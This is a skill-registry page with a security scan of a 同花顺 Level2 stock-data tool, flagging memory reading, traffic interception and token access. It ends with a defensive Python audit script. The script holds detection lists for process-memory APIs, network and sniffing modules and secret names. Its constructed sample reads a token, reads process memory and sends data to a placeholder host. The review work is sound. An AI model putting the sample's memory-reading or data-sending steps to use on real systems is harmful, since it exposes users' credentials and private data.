Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

同花顺 Level2 data access

v1.0.0

A tool for fetching and deeply analysing 同花顺 Level2 data. It supports reading local data from the 同花顺远航 client, analysing stock quotes, retrieving real-time Level2 data and generating technical-analysis reports. Used for: (1) fetching real-time data for held stocks (2) Level2 capital-flow analysis (3) deep analysis of individual stocks (4) generating investment-strategy reports.

License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The skill claims to extract Level2 data from the 同花顺远航 client and produce analyses; the repository contains many scripts that read local 同花顺 files (DataPushJob.xml, local DB path), generate protocol client code, call Tushare, and perform technical/capital analyses. These capabilities are coherent with the stated purpose. However, several included capabilities (memory reading, TCP stream capture / MITM suggestions) are high privilege and would only be needed to obtain data that the client does not expose via its APIs.
Instruction Scope
SKILL.md tells the user to copy the repo into the skills folder and run various scripts. The runtime instructions and several scripts (analyze_protocol.py, ths_memory_reader.py, ths_client.py) explicitly reference: reading local client files under D:\同花顺远航版, capturing TCP streams and performing MITM-like interception, and memory-reading that needs administrator privileges. Those actions access sensitive local state beyond simple API calls and broaden the risk surface. The instructions do not direct any explicit remote exfiltration, but the code could be run to collect sensitive local data.
Install Mechanism
There is no automated install spec (instruction-only installation via copying or git clone). That lowers supply-chain risk from remote installers, but the package still contains 25+ Python files that run with your privileges once you execute them. The SKILL.md suggests a git clone URL placeholder (https://github.com/your-repo/ths-level2.git), but the registry source/homepage are unknown; the lack of a verified upstream is a provenance concern.
Credentials
Registry metadata declares no required env vars, but many scripts read TUSHARE_TOKEN from the environment (SKILL.md even recommends exporting it). The skill also expects a local 同花顺 install path and optional access to its DB/XML and to network endpoints (hevo-h.10jqka.com.cn:9601). Asking for a Tushare token is proportional to the stated extended-data features, but the manifest did not list it as required, a mild inconsistency. No other unrelated credentials are requested in metadata.
Persistence & Privilege
always:false and disable-model-invocation:false (normal). The skill does not declare or appear to require permanent agent-wide privileges or modifications to other skills. It does include scripts that write analysis files to the skill directory, which is expected behavior.
What to consider before installing
Key points before you install or run this skill:

- Source provenance: the skill's registry entry has no homepage and the SKILL.md references a placeholder git URL; only proceed if you can verify the upstream repository and its author. Do not run untrusted code from unknown origins.
- High-privilege operations: several scripts attempt to read the local 同花顺 client files, parse DataPushJob.xml, perform TCP stream capture and even read process memory. These require administrator privileges and access to local network streams; only enable or run such features in an isolated environment (VM), with explicit consent and an understanding of the legal/ToS implications.
- Secrets: the code reads TUSHARE_TOKEN from the environment. If you provide your Tushare token, treat it as sensitive and avoid giving it to untrusted code. Consider using a limited/scoped token or a throwaway account for testing.
- Review code: because installation is manual (copying the repo), open and inspect ths_memory_reader.py, analyze_protocol.py, ths_client.py, and any networking code before running. Look for hardcoded remote endpoints, unexpected transmissions, or obfuscated code (none obvious in the provided files, but always verify).
- Run minimal features first: to reduce risk, start with read-only analysis scripts that operate on sample or exported JSON data (ths_local_analysis.py, complete_technical_analysis.py) rather than the memory- or network-capture scripts.
- Test in sandbox: run the repo in a disposable environment (VM or container) as a non-privileged user to confirm behavior before granting admin rights or pointing it at your real 同花顺 installation.
- Legal/compliance: the SKILL.md warns that Level2 is a paid service; ensure you have rights to access and process this data and that intercepting the client/server traffic does not violate terms of service or laws in your jurisdiction.
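The "Review code" and "Secrets" points above reduce to a short list of patterns you can check for mechanically before running anything. The script below is an added example for this page, not the ClawHub scanner and not code from the skill: it parses every .py file under a directory with the standard-library ast module and reports network imports and calls, hard-coded URLs or host:port strings (such as the hevo-h.10jqka.com.cn:9601 endpoint the report mentions), os.environ reads of token-like names, Windows process-memory APIs (OpenProcess, ReadProcessMemory) and subprocess/os.system execution. The module and function watch-lists are a heuristic starting set, and SAMPLE is a constructed source modelled on the behaviours the report describes, not text taken from the skill.

```python
"""Static pre-run triage of a skill directory.

Added example for this page; it is not the ClawHub scanner and not code
from the skill.  It parses each *.py file with ``ast`` and reports the
behaviours the scan report says to look for before running anything.
"""
import ast
import re
from pathlib import Path

# Heuristic watch-lists (assumptions; extend as needed).
NETWORK_MODULES = {"socket", "requests", "urllib", "http", "httpx", "aiohttp",
                   "websocket", "scapy", "pyshark", "mitmproxy"}
MEMORY_MODULES = {"ctypes", "win32api", "win32process", "pymem", "psutil"}
EXEC_MODULES = {"subprocess", "os"}
MEMORY_CALLS = {"OpenProcess", "ReadProcessMemory", "WriteProcessMemory", "VirtualQueryEx"}
EXEC_CALLS = {"system", "popen", "run", "Popen", "call", "check_output", "check_call"}
SECRET_NAME = re.compile(r"TOKEN|SECRET|PASSW|API_?KEY", re.I)
# Hard-coded URLs or host:port pairs such as hevo-h.10jqka.com.cn:9601.
ENDPOINT = re.compile(r"https?://[^\s\"']+|\b[a-z0-9.-]+\.[a-z]{2,}:\d{2,5}\b", re.I)


def _attr_chain(node):
    """Return 'a.b.c' for a Name/Attribute chain, or '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _const_str(node):
    """String value of a constant node (unwrapping ast.Index on Python 3.8), else None."""
    if type(node).__name__ == "Index":
        node = node.value
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None


def audit_source(source, filename="<string>"):
    """Return (category, line, detail) findings for one Python source text."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = ([a.name for a in node.names] if isinstance(node, ast.Import)
                     else [node.module or ""])
            for name in names:
                root = name.split(".")[0]
                if root in NETWORK_MODULES:
                    findings.append(("network-import", node.lineno, name))
                elif root in MEMORY_MODULES:
                    findings.append(("memory-import", node.lineno, name))
        elif isinstance(node, ast.Call):
            chain = _attr_chain(node.func)
            root, last = chain.split(".")[0], chain.rsplit(".", 1)[-1]
            arg0 = _const_str(node.args[0]) if node.args else None
            # os.environ.get("TUSHARE_TOKEN") / os.getenv("...") with a secret-like name
            if chain in ("os.environ.get", "os.getenv") and arg0 and SECRET_NAME.search(arg0):
                findings.append(("env-secret", node.lineno, arg0))
            elif last in MEMORY_CALLS:
                findings.append(("memory-api", node.lineno, chain))
            elif root in EXEC_MODULES and last in EXEC_CALLS:
                findings.append(("exec", node.lineno, chain))
            elif root in NETWORK_MODULES:
                findings.append(("network-call", node.lineno, chain))
        elif isinstance(node, ast.Subscript):
            key = _const_str(node.slice)  # os.environ["TUSHARE_TOKEN"]
            if _attr_chain(node.value) == "os.environ" and key and SECRET_NAME.search(key):
                findings.append(("env-secret", node.lineno, key))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for hit in ENDPOINT.findall(node.value):
                findings.append(("endpoint", node.lineno, hit))
    return findings


def audit_directory(root):
    """Map each *.py path under root to its findings (files with none are omitted)."""
    report = {}
    for path in sorted(Path(root).rglob("*.py")):
        try:
            found = audit_source(path.read_text(encoding="utf-8", errors="replace"), str(path))
        except SyntaxError as exc:
            found = [("parse-error", exc.lineno or 0, exc.msg)]
        if found:
            report[str(path)] = found
    return report


# Constructed sample modelled on the behaviours the scan report describes;
# it is not text from the skill.
SAMPLE = '''\
import os, socket
import ctypes
import tushare as ts

TOKEN = os.environ.get("TUSHARE_TOKEN")
HOST = "hevo-h.10jqka.com.cn:9601"

def read_memory(pid):
    h = ctypes.windll.kernel32.OpenProcess(0x10, False, pid)
    ctypes.windll.kernel32.ReadProcessMemory(h, 0, None, 0, None)

def upload(data):
    s = socket.create_connection(("example.invalid", 443))
    s.sendall(data)
'''

if __name__ == "__main__":
    import sys
    report = ({"<sample>": audit_source(SAMPLE)} if len(sys.argv) < 2
              else audit_directory(sys.argv[1]))
    for path, found in report.items():
        for category, line, detail in found:
            print(f"{path}:{line}: {category}: {detail}")
```

Run it as `python audit_skill.py path/to/ths-level2` after cloning; with no argument it audits the embedded sample. A finding is a prompt to open the file at that line, not a verdict, and because the check is static it will miss dynamic imports, strings assembled at runtime, and obfuscated code, which is why the sandbox run in the next point is still needed.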


Tags: finance, latest, level2, stock, technical-analysis
